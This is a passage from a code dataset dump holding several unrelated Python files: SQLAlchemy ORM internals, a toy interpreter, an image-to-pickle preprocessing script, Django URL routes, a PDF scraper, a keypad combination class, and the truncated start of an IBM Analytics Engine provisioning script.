columns_to_assign(self) -> List[Column]:\n return [self.column]\n\n def __clause_element__(self):\n return self.column\n\n def operate(self, op, *other, **kwargs):\n return op(self.__clause_element__(), *other, **kwargs)\n\n def reverse_operate(self, op, other, **kwargs):\n col = self.__clause_element__()\n return op(col._bind_param(op, other), col, **kwargs)\n\n def declarative_scan(\n self, registry, cls, key, annotation, is_dataclass_field\n ):\n column = self.column\n if column.key is None:\n column.key = key\n if column.name is None:\n column.name = key\n\n sqltype = column.type\n\n argument = _extract_mapped_subtype(\n annotation,\n cls,\n key,\n MappedColumn,\n sqltype._isnull and not self.column.foreign_keys,\n is_dataclass_field,\n )\n if argument is None:\n return\n\n self._init_column_for_annotation(cls, registry, argument)\n\n @util.preload_module(\"sqlalchemy.orm.decl_base\")\n def declarative_scan_for_composite(\n self, registry, cls, key, param_name, param_annotation\n ):\n decl_base = util.preloaded.orm_decl_base\n decl_base._undefer_column_name(param_name, self.column)\n self._init_column_for_annotation(cls, registry, param_annotation)\n\n def _init_column_for_annotation(self, cls, registry, argument):\n sqltype = self.column.type\n\n nullable = False\n\n if hasattr(argument, \"__origin__\"):\n nullable = NoneType in argument.__args__\n\n if not self._has_nullable:\n self.column.nullable = nullable\n\n if sqltype._isnull and not self.column.foreign_keys:\n sqltype = None\n our_type = de_optionalize_union_types(argument)\n\n if is_fwd_ref(our_type):\n our_type = de_stringify_annotation(cls, our_type)\n\n if registry.type_annotation_map:\n sqltype = registry.type_annotation_map.get(our_type)\n if sqltype is None:\n sqltype = sqltypes._type_map_get(our_type)\n\n if sqltype is None:\n raise sa_exc.ArgumentError(\n f\"Could not locate SQLAlchemy Core \"\n f\"type for Python type: {our_type}\"\n )\n self.column.type = sqltype\n","sub_path":"lib/sqlalchemy/orm/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":16721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"412570714","text":"from cache import Cache\r\nimport random\r\n\r\nif __name__ == '__main__':\r\n\r\n # Test the cache\r\n Keys = [i for i in range(7)] # Entries\r\n sites = ['entry 1 ','entry 2 ','entry 3 ','entry 4 ' ]\r\n\r\n # Cache object using fucntion cache\r\n cache = Cache()\r\n\r\n print('_'*40)\r\n # Updating Cache with entries\r\n for i, key in enumerate(Keys):\r\n if key in cache:\r\n continue\r\n else:\r\n value = ''.join([random.choice(sites)])\r\n print('\\t', value)\r\n cache.update(key, value)\r\n\r\n print(\"{0}.Iteration, #{1} cached entries\" .format(i+1, cache.size()))\r\n\r\n # Cache List\r\n print('\\n\\n\\t', '*'*10, ' CACHE LIST ', '*'*10)\r\n for k, v in cache.view().items():\r\n print(\"{0} : {1}\".format(k, v))\r\n print('_' * 60)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"570482987","text":"from .interpreter import Interpreter\nfrom enum import Enum\nimport re\nimport copy\nclass Executer:\n\n class Statment:\n def __init__(self, code:int = -1, line: str = \"\"):\n self.code = code \n self.line = line\n def __str__(self):\n return \"code: \"+str(self.code)+\"\\tLine:\"+self.line\n\n class Variable:\n def __init__(self, name: str, value: str, vType: str):\n self.name = name\n self.type = vType\n self.setValue(value)\n \n def __str__(self):\n return self.name + \",\"+ str(self.value)+\",\"+self.type\n \n def setValue(self, val:str):\n if(self.type == \"CHAR\"):\n if(len(val) == 3 or len(val)==0):\n self.value = val.replace('\\'','')\n else:\n raise\n elif(self.type == \"FLOAT\"):\n self.value = float(val)\n elif(self.type == \"INT\"):\n self.value = int(val)\n elif(self.type == \"BOOL\"):\n self.value = val\n # print(val)\n # if(val == 'TRUE' or val == 'FALSE'):\n # self.value = True if val == \"TRUE\" else False\n # elif(val == True or val == False):\n # self.value = val\n # else:\n # raise Exception('Error setting', val)\n else:\n self.value = val\n def getValue(self):\n return self.value\n \n def getName(self):\n return self.name\n\n class Code(Enum):\n ERROR = -1\n INIT_STATEMENT = 0\n COMMENT_STATEMENT = 1\n START_STATEMENT = 2\n STOP_STATEMENT = 3\n OUTPUT_STATEMENT = 4\n ASSIGNMENT_STATEMENT = 5\n IF_STATEMENT = 6\n WHILE_STATEMENT = 7\n INPUT_STATEMENT = 8\n ELSE_STATEMENT = 9\n \n\n def __init__(self):\n self.interpreter = Interpreter()\n self.parsed = []\n self.memory = {}\n self.lines = []\n self.inputs = []\n self.programStarted: bool = False\n self.programStopped: bool = True\n \n def setInputs(self, inputs):\n self.inputs = inputs\n\n def setMemory(self, memory):\n self.memory = memory\n \n def displayLines(self):\n for index,val in enumerate(self.lines):\n print(index, val)\n\n def displayParsed(self):\n for i,stmt in enumerate(self.parsed):\n print('PARSED:',i,stmt)\n \n def displayMemory(self):\n for attr, value in self.memory.items():\n print(attr, ':', value)\n\n def setLines(self,strLines):\n self.lines = [ line for line in strLines if self.getCode(line) != self.Code.COMMENT_STATEMENT]\n for index,line in enumerate(self.lines):\n stmt = self.Statment(self.getCode(line), line)\n if(stmt.code == self.Code.START_STATEMENT):\n self.programStarted = True\n elif(stmt.code == self.Code.INIT_STATEMENT and self.programStarted):\n raise Exception('Variable Declaration done after Start')\n elif(stmt.code == self.Code.ERROR):\n raise Exception('Error on Line',index, line)\n self.parsed.append(stmt)\n if(not self.programStarted):\n raise Exception('No START statement')\n if(self.parsed[-1].code != self.Code.STOP_STATEMENT):\n raise Exception('Program does not end with an STOP statement')\n \n\n def setParsed(self, parsed):\n self.parsed = parsed\n\n def processParsed(self):\n index = 0\n while(index < len(self.parsed)):\n stmt = self.parsed[index]\n if(stmt.code == self.Code.START_STATEMENT):\n pairStopIndex = self.findPairStop(index+1)\n statements = self.parsed[index+1:pairStopIndex]\n del self.parsed[index:pairStopIndex+1]\n executer = Executer()\n executer.setParsed(statements)\n self.parsed.insert(index,executer)\n index = index + 1\n \n def findPairStop(self, index):\n numStack = 1\n pairStopIndex = -1\n for idx, stmt in enumerate(self.parsed[index:]):\n if(stmt.code == self.Code.START_STATEMENT):\n numStack = numStack + 1\n elif (stmt.code == self.Code.STOP_STATEMENT):\n numStack = numStack - 1\n if(numStack == 0):\n pairStopIndex = idx\n break\n if(pairStopIndex == -1):\n raise Exception('Un paired START on line', index)\n return index + pairStopIndex\n\n def executeProgram(self):\n self.processParsed()\n index = 0\n strLines = []\n while index < len(self.parsed):\n stmt = self.parsed[index]\n addToIndex, strNewLines = self.executeStatement(stmt, index)\n index = index + addToIndex\n strLines = strLines + strNewLines\n index = index + 1\n return strLines\n \n def executeStatement(self, stmt, currentIndex):\n index = 0\n strLines = []\n if(isinstance(stmt, Executer)):\n stmt.setInputs(self.inputs)\n stmt.setMemory(self.memory)\n strLines = stmt.executeProgram() + strLines\n else:\n if(stmt.code == self.Code.INIT_STATEMENT):\n self.execute_INIT_STATEMENT(stmt.line)\n elif(stmt.code == self.Code.START_STATEMENT):\n self.execute_START_STATEMENT()\n elif(stmt.code == self.Code.STOP_STATEMENT):\n self.execute_STOP_STATEMENT()\n elif(stmt.code == self.Code.ASSIGNMENT_STATEMENT):\n self.execute_ASSIGNMENT_STATEMENT(stmt.line)\n elif(stmt.code == self.Code.OUTPUT_STATEMENT):\n strLines = strLines + self.execute_OUTPUT_STATEMENT(stmt.line)\n elif(stmt.code == self.Code.IF_STATEMENT):\n addToIndex = 0\n hasElse = False\n if(currentIndex+2 < len(self.parsed)):\n hasElse = self.parsed[currentIndex+2].code == self.Code.ELSE_STATEMENT\n # print(\"has Else\",hasElse, currentIndex+2)\n # for i, val in enumerate(self.parsed):\n # print('IF',i, val)\n result = self.execute_IF_STATEMENT(stmt.line)\n if(result):\n if(hasElse):\n del self.parsed[currentIndex+3] # Executer\n del self.parsed[currentIndex+2] # Else STATEMENT\n else:\n addToIndex = 1\n \n index = index + addToIndex\n \n elif(stmt.code == self.Code.ELSE_STATEMENT):\n pass\n elif(stmt.code == self.Code.INPUT_STATEMENT):\n self.execute_INPUT_STATEMENT(stmt.line)\n elif(stmt.code == self.Code.WHILE_STATEMENT):\n addToIndex, strNewLines = self.execute_WHILE_STATEMENT(stmt.line, currentIndex)\n index = index + addToIndex\n strLines = strLines + strNewLines\n return index, strLines\n\n def execute_INIT_STATEMENT(self, strLine):\n terms = self.removeGarbageFromArray(re.split(\"(VAR)|(AS)|(INT)|(CHAR)|(BOOL)|(FLOAT)|(,)\", strLine))\n # print(terms)\n # Get Type\n varType = terms[-1]\n # Get Initializations\n for term in terms:\n term = term.strip()\n defaultValue = self.getDefaultValueOfType(varType)\n if(self.interpreter.isKeyWord(term)):\n continue\n elif(self.interpreter.isValidIdentifier(term)):\n self.addVariable(term, defaultValue, varType)\n elif(self.interpreter.isValidAssignmentStatement(term)):\n newTerm = self.removeGarbageFromArray(term.split('='))\n self.addVariable(newTerm[0],defaultValue,varType)\n self.execute_ASSIGNMENT_STATEMENT(term)\n \n def execute_IF_STATEMENT(self, strLine):\n terms = self.removeGarbageFromArray(re.split('(IF)',strLine))\n return self.solveBooleanEquation(terms[1])\n\n def execute_WHILE_STATEMENT(self, strLine, index):\n terms = self.removeGarbageFromArray(re.split('(WHILE)',strLine))\n strLines = []\n while(self.solveBooleanEquation(terms[1])):\n stmt = copy.deepcopy(self.parsed[index+1])\n newIndex, strNewLines = self.executeStatement(stmt, index + 1)\n strLines = strLines + strNewLines\n return 1 , strLines\n \n def solveBooleanEquation(self, equation):\n \n isBooleanEquation = self.interpreter.isValidBooleanOperation(equation)\n eqTerms = re.split('(\\()|(\\))|(\\=\\=)|(\\<\\=)|(\\>\\=)|(\\&\\&)|(\\|\\|)|(\\<)|(\\>)',equation)\n eqTerms = self.removeGarbageFromArray(eqTerms)\n nodeList = []\n for term in eqTerms:\n if(not self.interpreter.isBooleanOperator(term) and self.interpreter.isValidArithmeticOperation(term)):\n term = str(self.solveArithmeticEquation(term))\n temp = Interpreter.Node(term)\n nodeList.append(temp)\n # print('Nodelist:',nodeList)\n\n print(nodeList)\n node = self.nodeCreate(nodeList, [\"==\",\"<=\",\">=\",\"<\",\">\",\"&&\",\"||\"])\n return self.evaluateNode(node)\n \n def solveArithmeticEquation(self, equation):\n eqTerms = re.split(' |(\\+)|(\\/)|(\\-)|(\\*)|(\\%)|(\\()|(\\))',equation)\n eqTerms = self.removeGarbageFromArray(eqTerms)\n nodeList = []\n for term in eqTerms:\n temp = Interpreter.Node(term)\n nodeList.append(temp)\n node = self.nodeCreate(nodeList)\n return self.evaluateNode(node)\n\n def execute_START_STATEMENT(self):\n self.programStarted = True\n self.programStopped = False\n\n def execute_INPUT_STATEMENT(self,strLine):\n terms = self.removeGarbageFromArray(re.split('(INPUT:)|,',strLine))\n terms = terms[1:]\n for term in terms:\n try:\n if len(self.inputs) == 0:\n raise\n data = self.inputs.pop(0)\n print('Setting '+term+\" with \"+data)\n self.setVariable(term, data)\n except:\n print(self.inputs)\n raise Exception('Input:'+term+\" caused error.\")\n\n def execute_STOP_STATEMENT(self):\n self.programStarted = False\n self.programStopped = True\n\n def execute_ASSIGNMENT_STATEMENT(self, strLine):\n terms = self.removeGarbageFromArray(re.split(' |(\\=\\=)|(\\=)', strLine))\n equation = \"\"\n indexOfEQ = 0\n for i, e in reversed(list(enumerate(terms))):\n if e == \"=\":\n break\n equation = e + equation\n indexOfEQ = i\n del terms[indexOfEQ:]\n val = None\n if(self.interpreter.isValidArithmeticOperation(equation)):\n val = self.solveArithmeticEquation(equation)\n if(self.interpreter.isValidBooleanOperation(equation)):\n print('Solving boolean equation',equation)\n val = self.solveBooleanEquation(equation)\n # val = self.solveBooleanEquation(equation) if isBooleanEquation else \n # val = self.evaluateNode(node)\n variables = [x for x in terms if x is not '=']\n for variable in variables:\n self.setVariable(variable, val)\n\n def evaluateNode(self, node):\n return self.postOrder(node, True)\n \n def postOrder(self, node, evaluationMode = False):\n if node == None:\n return None\n elif node.left == None and node.right == None:\n # print('Node Value:',node.value)\n if self.interpreter.isValidNumericConstant(node.value):\n return float(node.value) if \".\" in node.value else int(node.value)\n elif self.interpreter.isValidBooleanConstant(node.value) or node.value == 'True' or node.value == 'False':\n if evaluationMode:\n return True if node.value == \"TRUE\" or 'True' else False\n elif(node.value == 'True' or node.value == 'False'):\n return True if node.value == 'True' else False\n elif self.interpreter.isValidIdentifier(node.value):\n return self.getVariableData(node.value)\n else:\n return node.value\n else:\n left = self.postOrder(node.left)\n right = self.postOrder(node.right)\n operation = node.value\n result = 0\n if(isinstance(left, bool)):\n left = 'TRUE' if left == True else left\n left = 'FALSE' if left == False else left\n if(isinstance(right,bool)):\n right = 'TRUE' if right == True else right\n right = 'FALSE' if right == False else right\n # print(\"Left:\", left, \"Right:\", right, \"Operation\", operation)\n if operation == \"*\":\n result = float(left) * float(right)\n elif operation == \"/\":\n result = float(left) / float(right)\n elif operation == \"%\":\n result = float(left) % float(right)\n elif operation == \"+\":\n result = float(left) + float(right)\n elif operation == \"-\":\n result = float(left) - float(right)\n #boolean operations\n elif operation == \"==\":\n result = left == right\n elif operation == \"<=\":\n result = left <= right\n elif operation == \">=\":\n result = left >= right\n elif operation == \"<\":\n result = left < right\n elif operation == \">\":\n result = left > right\n elif operation == \"&&\":\n result = left and right\n elif operation == \"||\":\n result = left or right\n else:\n result = None\n if(isinstance(result, bool)):\n result = 'TRUE' if result == True else result\n result = 'FALSE' if result == False else result\n return result\n\n def execute_OUTPUT_STATEMENT(self, strLine):\n terms = self.removeGarbageFromArray(re.split('OUTPUT:|&',strLine))\n outputStr = \"\"\n outputLines = []\n for term in terms:\n if(self.interpreter.isValidIdentifier(term)):\n data = self.getVariableData(term)\n if data is int or data is float:\n outputStr+= repr(data)\n else:\n outputStr+= str(data)\n elif(self.interpreter.isNewLine(term)):\n outputLines.append(outputStr)\n outputStr = \"\"\n elif(self.interpreter.isValidStringConstant(term)):\n term = term.replace('\"','')\n outputStr+= term\n else:\n raise Exception('Unknown term'+str(term))\n outputLines.append(outputStr)\n return outputLines\n\n def removeGarbageFromArray(str, terms, strip = True):\n terms = [x for x in terms if x is not None]\n terms = [x for x in terms if x is not ' ']\n terms = [x for x in terms if x is not '']\n if(strip):\n terms = [x.strip() for x in terms]\n return terms\n\n def getDefaultValueOfType(self, varType: str):\n switch = {\n \"INT\": 0,\n \"BOOL\": False,\n \"CHAR\": '',\n \"FLOAT\": 0.0\n }\n return switch.get(varType, None)\n \n def addVariable(self, name: str, initVal: str, varType: str):\n self.memory[name] = self.Variable(name,initVal,varType)\n\n def setVariable(self, name:str, newVal: str):\n if(name in self.memory):\n self.memory[name].setValue(newVal)\n else:\n print(name,\"caused an exception\")\n raise\n \n def getVariableData(self, name:str):\n variable = None\n try:\n variable = self.memory[name].getValue()\n except:\n raise Exception('Cant Find:['+name+']\\nMemory:')\n return variable\n\n def getCode(self, strLine):\n if(self.interpreter.isValidCommentStatement(strLine)):\n return self.Code.COMMENT_STATEMENT\n if(self.interpreter.isValidInitializationStatement(strLine)):\n return self.Code.INIT_STATEMENT\n if(self.interpreter.isValidStartStatement(strLine)):\n return self.Code.START_STATEMENT\n if(self.interpreter.isValidStopStatement(strLine)):\n return self.Code.STOP_STATEMENT\n if(self.interpreter.isValidOutputStatement(strLine)):\n return self.Code.OUTPUT_STATEMENT\n if(self.interpreter.isValidAssignmentStatement(strLine)):\n return self.Code.ASSIGNMENT_STATEMENT\n if(self.interpreter.isValidIFstatement(strLine)):\n return self.Code.IF_STATEMENT\n if(self.interpreter.isELSE(strLine)):\n return self.Code.ELSE_STATEMENT\n if(self.interpreter.isValidWhileStatement(strLine)):\n return self.Code.WHILE_STATEMENT\n if(self.interpreter.inValidINPUTStatement(strLine)):\n return self.Code.INPUT_STATEMENT\n return self.Code.ERROR\n \n def findPair(self,nodeList: [], index):\n stack = []\n retIndex = index\n for node in nodeList:\n if(node.value == '('):\n stack.append(node.value)\n elif(node.value == ')'):\n stack.pop()\n if len(stack) == 0:\n break\n retIndex = retIndex + 1\n return retIndex\n\n def nodeCreate(self,nodeList:[], operationSequence = [['*','/','%'],['+','-']]):\n index = 0\n # print(\"Node List Start:\", nodeList)\n while index < len(nodeList):\n if (nodeList[index].value == '('):\n pairIndex= self.findPair(nodeList[index:],index)\n removedList = nodeList[index:pairIndex+1]\n del removedList[0]\n del removedList[-1]\n node = self.nodeCreate(removedList, operationSequence)\n del nodeList[index:pairIndex+1]\n node.value = str(self.postOrder(node))\n node.left = node.right = None\n nodeList.insert(index,node)\n index = index + 1\n if(len(nodeList) > 0):\n for operation in operationSequence:\n index = 0\n while index < len(nodeList):\n if(nodeList[index].value in operation):\n if(index+1 < len(nodeList)):\n nodeList[index].right = nodeList[index+1]\n del nodeList[index+1]\n if(index-1 >= 0):\n nodeList[index].left = nodeList[index-1]\n del nodeList[index-1]\n index = index + 1\n return nodeList[0]","sub_path":"old/executer.py","file_name":"executer.py","file_ext":"py","file_size_in_byte":19036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"48208743","text":"import os\r\nimport cv2\r\n#import pandas as pd\r\nimport pickle\r\nimport random\r\nimport numpy as np\r\n#import matplotlib.pyplot as plt\r\nimport gc\r\n\r\nPATH2= \"C:\\\\Users\\Aditya\\\\Desktop\\\\TEMProject\\\\Validation Set\"\r\nPATH = \"C:\\\\Users\\Aditya\\\\Desktop\\\\TEMProject\\\\Dataset\"\r\ntraining_data=[]\r\nIMG_SIZE =32\r\n#f = np.memmap('memmapped.dat', dtype=np.float64,mode='w+',shape=(10**2,81,81))\r\nX_train=[]\r\ny_train=[]\r\nX_test=[]\r\ny_test=[]\r\n\r\n\r\n\r\ndef create_training():\r\n\r\n for i in range(43):\r\n j=0\r\n\r\n str = PATH + \"{}{}\".format(\"\\\\\", i)\r\n if not os.path.exists(str):\r\n print(\"Skipped\",i)\r\n continue\r\n\r\n else:\r\n print(i)\r\n for file in os.listdir(str):\r\n #if(j>300):\r\n #break\r\n\r\n\r\n #img_array = cv2.imread(os.path.join(str, file), cv2.IMREAD_GRAYSCALE)\r\n new_array = cv2.resize( cv2.imread(os.path.join(str, file), cv2.IMREAD_GRAYSCALE), (IMG_SIZE, IMG_SIZE)) / 255.0\r\n #new_array=new_array/255\r\n #plt.imshow(new_array,cmap='gray')\r\n training_data.append([new_array, i])\r\n j+=1\r\n\r\n\r\n\r\ncreate_training()\r\n\r\nrandom.shuffle(training_data)\r\n\r\n\r\nfor features, label in training_data:\r\n X_train.append(features)\r\n y_train.append(label)\r\nX_train=np.array(X_train).reshape(-1,IMG_SIZE,IMG_SIZE,1)\r\npickle_out = open(\"X_train.pickle\", \"wb\")\r\npickle.dump(X_train, pickle_out)\r\npickle_out.close()\r\npickle_out = open(\"y_train.pickle\", \"wb\")\r\npickle.dump(y_train, pickle_out)\r\npickle_out.close()\r\nprint(\"Done w training \")\r\nprint(y_train[:10])\r\ngc.collect()\r\n\r\n\r\ndef create_validation() :\r\n\r\n for i in range(43):\r\n j=0\r\n str = PATH2 + \"{}{}\".format(\"\\\\\", i)\r\n if not os.path.exists(str):\r\n print(\"Skipped\",i)\r\n continue\r\n\r\n else:\r\n print(i)\r\n for file in os.listdir(str):\r\n if file == '{}.jpg'.format(i):\r\n print(\"SKIPPED\",file)\r\n pass\r\n #if(j>90):\r\n #break\r\n\r\n\r\n\r\n img_array = cv2.imread(os.path.join(str, file), cv2.IMREAD_GRAYSCALE)\r\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\r\n new_array=new_array/255\r\n #plt.imshow(new_array,cmap='gray')\r\n training_data.append([new_array, i])\r\n j+=1\r\n\r\n\r\n\r\n\r\n\r\ntraining_data=[]\r\ncreate_validation()\r\nrandom.shuffle(training_data)\r\nfor features, label in training_data:\r\n X_test.append(features)\r\n y_test.append(label)\r\nX_test=np.array(X_test).reshape(-1,IMG_SIZE,IMG_SIZE,1)\r\nprint(y_test[:10])\r\npickle_out = open(\"X_test.pickle\", \"wb\")\r\npickle.dump(X_test, pickle_out)\r\npickle_out.close()\r\npickle_out = open(\"y_test.pickle\", \"wb\")\r\npickle.dump(y_test, pickle_out)\r\npickle_out.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"2traincopy.py","file_name":"2traincopy.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"52887581","text":"from django.conf.urls import url\n\nfrom .api import (\n CreateUser, LoginUser, CurrentUser,\n SignupAnonymousUser)\n\n\nurlpatterns = [\n url(r'^signup/$',\n CreateUser.as_view(),\n name='create-user'),\n url(r'^login/$', \n LoginUser.as_view(), \n name='login-user'),\n url(r'^$',\n CurrentUser.as_view(),\n name='current-user'),\n url(r'^anonymous/$',\n SignupAnonymousUser.as_view(),\n name='create-anon-user')\n]","sub_path":"monthly_expenses/apps/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"393845391","text":"from dataclasses import dataclass, field\nimport itertools\nimport re\nimport sys\nfrom typing import Dict, Generator, List\n\nfrom PyPDF2 import PdfFileReader\n\n\ndef clean_text(text: str) -> str:\n text = re.sub(\n r\"Case\\s1\\:14\\-cv\\-\\d+\\-[A-Z]+\\-[A-Z]+\\s+Document\\s\\d+\\s+Filed\\s\\d{2}/\\d{2}/\\d{2}\\s+Page\\d\\d+\\sof\\s\\d+\",\n \"\",\n text,\n )\n return text\n\n\n@dataclass\nclass Paragraph:\n number: int = 0\n pages: List[int] = field(default_factory=list)\n text: str = \"\"\n\n @property\n def primary_compliance(self) -> str:\n compliance = {}\n match = re.search(\n r\"Primary:\\s+([a-zA-Z]+\\s+[a-zA-Z]+\\s{0,1}[a-zA-Z]*\\s{0,1}\\w*)\\s\\s*\",\n self.text,\n )\n if match:\n return match.group(1)\n else:\n return \"None\"\n\n @property\n def secondary_compliance(self) -> str:\n match = re.search(\n r\"Secondary:\\s+([a-zA-Z]+\\s+[a-zA-Z]+\\s{0,1}[a-zA-Z]*\\s{0,1}\\w*)\\s\\s*\",\n self.text,\n )\n if match:\n return match.group(1)\n else:\n return \"None\"\n\n @property\n def operational_compliance(self) -> str:\n match = re.search(\n r\"Operational:\\s+([a-zA-Z]+\\s+[a-zA-Z]+\\s{0,1}[a-zA-Z]*\\s{0,1}[a-zA-Z]*)\\b(? int:\n match = re.search(r\"^\\s*(\\d{1,3})\\s+\", page.replace(\"\\n\", \"\"))\n if match:\n return int(match.group(1))\n else:\n return 0\n\n\ndef operational_section(pages: Generator) -> Generator:\n front_matter = True\n next(itertools.islice(pages, 3, None)) # skip TOC\n while front_matter:\n page = next(pages)\n match = re.search(r\"\\s4\\.7\\s+\\w+\", page)\n if match:\n front_matter = False\n chained = itertools.chain((i for i in [page]), pages)\n return (item for item in chained)\n\n\ndef scrape_data(pages: Generator, page_count: int) -> List:\n paragraphs = []\n _pages = []\n p = Paragraph()\n for i, page in enumerate(pages):\n page_num = get_page_num(page)\n _pages.append(page_num)\n page = page.replace(\"\\n\", \"\")\n page = re.sub(r\"^\\s*(\\d{1,3})\\s+\", \"\", page)\n page_split = re.split(\n r\"4\\.7\\.\\d+\\sAssessing\\sCompliance\\s[with\\s]*Paragraph\\s(\\d{2,3})\\:*\", page\n )\n if len(page_split) > 1:\n for x in page_split:\n match = re.search(r\"^(\\d+)$\", x)\n if match:\n if p:\n p.text = clean_text(text)\n p.pages = _pages\n paragraphs.append(p)\n p = Paragraph()\n _pages = []\n _pages.append(page_num)\n text = \"\"\n paragraph_num = match.group(1)\n p.number = paragraph_num\n elif p and not match:\n text += x\n else:\n text += \"\\n\\n\"\n text += page\n if i + 1 == page_count:\n p.text = text\n p.pages = _pages\n paragraphs.append(p)\n return paragraphs\n\n\ndef scrape(input_file: str) -> List[Paragraph]:\n with open(input_file, \"rb\") as f:\n reader = PdfFileReader(f)\n page_count = reader.getNumPages()\n pages = (reader.getPage(i).extractText() for i in range(page_count))\n pages = operational_section(pages)\n ps = scrape_data(pages, page_count - 3)\n return ps\n","sub_path":"PY_SCRAPER/imr-scraper/imrscrape/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"366615374","text":"from random import choice\n\"\"\"\nThe purpose of this file is to hold the classes and functions\nnecessary to allow the keypad to function. This includes\ngenerating a new set of keys and commands to see them.\n\"\"\"\n\nOLD_CHOICES = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']\nCHOICES = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\nclass Keypad():\n\n def __init__(self):\n self.combo = [choice(OLD_CHOICES), choice(OLD_CHOICES), choice(OLD_CHOICES)]\n\n # Generate a new set of random keys to press\n def generateKeys(self, switchValue):\n firstOne = ord(choice(OLD_CHOICES)) - ord('A')\n\n # Ensure that the first switch value is not the same as the current\n # switch value\n if switchValue is not None:\n switchValue = ord(switchValue) - ord('A')\n\n while(firstOne == switchValue):\n firstOne = ord(choice(OLD_CHOICES)) - ord('A')\n\n self.combo = [firstOne, ord(choice(OLD_CHOICES))- ord('A'), ord(choice(OLD_CHOICES)) - ord('A')]\n return 0\n\n # Get value of specified key\n def getKey(self, index):\n if (index <= 2 and index >= 0):\n return self.combo[index]\n else:\n # This is an error, as there are only 3 numbers\n return -1\n\n # Set values of combo\n def setCombo(self, newCombo):\n if (newCombo[0] >= 0 and\n newCombo[0] <= 15 and\n newCombo[1] >= 0 and\n newCombo[1] <= 15 and\n newCombo[2] >= 0 and\n newCombo[2] <= 15):\n self.combo = [newCombo[0], newCombo[1], newCombo[2]]\n return 0\n else:\n return -1\n\n # Checks that key pressed is the correct one for that index\n def checkKey(self, keystroke, index):\n return self.combo[index] == keystroke\n\n def checkCombo(self, entryQueue):\n if len(entryQueue) < 3:\n return False\n elif len(entryQueue) == 3:\n print(\"Proper Length, Check values\")\n # print(\"Expecting %(first)s, %(second)s, %(third)s\" % {'first': ord(self.combo[0]) - ord('A'),\n # 'second': ord(self.combo[1]) - ord('A'),\n # 'third': ord(self.combo[2]) - ord('A')\n # })\n convertQueue = list()\n convertQueue.append(int(entryQueue[0], 16))\n convertQueue.append(int(entryQueue[1], 16))\n convertQueue.append(int(entryQueue[2], 16))\n\n print(\"Expecting %(first)s, %(second)s, %(third)s\" % {'first': self.combo[0],\n 'second': self.combo[1],\n 'third': self.combo[2]\n })\n print(\"Pre %(first)s, %(second)s, %(third)s\" % {'first': entryQueue[0],\n 'second': entryQueue[1],\n 'third': entryQueue[2]\n })\n print(\"Raw %(first)s, %(second)s, %(third)s\" % {'first': convertQueue[0],\n 'second': convertQueue[1],\n 'third': convertQueue[2]\n })\n return self.checkKey(convertQueue[0], 0) and self.checkKey(convertQueue[1], 1) and self.checkKey(convertQueue[2], 2)\n else:\n print(\"TOO BIG\")\n # Queue is too big\n return False\n\n # get a string of the combination\n def sprintCombo(self):\n return '(%(first)s, %(second)s, %(third)s)' % {'first': self.combo[0],\n 'second': self.combo[1],\n 'third': self.combo[2]\n }\n\n # Print the current code to the terminal\n def printCombo(self):\n print (self.sprintCombo())\n","sub_path":"old_python/flask/functions/keypad.py","file_name":"keypad.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"389771968","text":"import sys,requests,json,time,os,argparse,re\nfrom retrying import retry\nfrom datetime import datetime\n\n# Set constants and the region which defines the REST API paths to use\ndef init(REGION = 'us-south'): \n IAM_PATHS = {\"us-south\":\"https://iam.ng.bluemix.net/identity/token\", \n \"eu-gb\": \"https://api.eu-gb.bluemix.net/identity/token\", \n \"jp-tok\" : \"https://iam.ng.bluemix.net/identity/token\", \n \"eu-de\": \"https://api.eu-de.bluemix.net/identity/token\"\n }\n\n if REGION not in IAM_PATHS:\n raise Exception(\"Incorrect region_id provided:{} Valid region_ids:\".format(REGION, list(IAM_PATHS.keys())))\n \n globals()['IAM_AUTH_PATH'] = IAM_PATHS[REGION]\n globals()['IAE_API_PATH'] = 'https://api.{}.ae.cloud.ibm.com/v2/analytics_engines'.format(REGION)\n globals()['RESOURCE_CONTROLLER_PATH_V1'] = 'https://resource-controller.cloud.ibm.com/v1'\n globals()['RESOURCE_CONTROLLER_PATH_V2'] = 'https://resource-controller.bluemix.net/v2' \n globals()['WDP_API_PATH'] = 'https://api.dataplatform.cloud.ibm.com/v2'\n globals()['IAE_RESOURCE_PLANS'] = {'lite': '7715aa8d-fb59-42e8-951e-5f1103d8285e',\n 'hourly':'3175a5cf-61e3-4e79-aa2a-dff9a4e1f0ae',\n 'monthly':'34594484-afda-40e6-b93b-341fbbaed242'}\n globals()['HARDWARE_CONFIGS'] = ['default','memory-intensive']\n\n globals()['CLUSTER_PROVISION_TEMPLATE']={\n \"name\": \"\",\n \"resource_plan_id\": \"\", \n \"resource_group_id\": \"\",\n \"region_id\": REGION,\n \"parameters\": {\n \"hardware_config\": \"\",\n \"num_compute_nodes\": \"\",\n \"software_package\": \"ae-1.1-hadoop-spark\", \n #ae-1.2-hive-llap, ae-1.2-hive-spark, ae-1.2-hadoop-spark,ae-1.1-spark, ae-1.1-hive-spark, ae-1.1-hadoop-spark\n \"advanced_options\": {\n \"ambari_config\": {\n \"spark2-defaults\": {\n \"spark.dynamicAllocation.enabled\": True,\n \"spark.shuffle.service.enabled\": True,\n \"spark.dynamicAllocation.minExecutors\": \"1\" ,\n 